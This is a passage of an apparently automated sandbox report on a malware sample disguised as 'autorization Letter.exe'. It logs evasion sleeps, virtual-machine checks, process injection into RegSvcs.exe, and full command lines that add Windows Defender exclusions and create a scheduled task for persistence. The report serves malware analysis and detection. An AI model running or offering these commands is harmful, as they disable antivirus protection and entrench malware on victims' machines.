                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exe TID: 7164Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 1020Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 4148Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\autorization Letter.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99640Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99519Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98814Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98344Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97999Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97562Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97344Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97219Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99859
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99638
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99531
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99421
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99312
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99203
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99093
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98983
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98765
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98655
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98437
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98328
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98219
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98094
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97984
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97863
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: RegSvcs.exe, 00000009.00000002.2211048894.0000000005BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{r
                      Source: RegSvcs.exe, 0000000E.00000002.3353008996.0000000005AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: autorization Letter.exe, 00000001.00000002.2157399976.0000000001703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g.T
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 87A008Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeQueries volume information: C:\Users\user\Desktop\autorization Letter.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
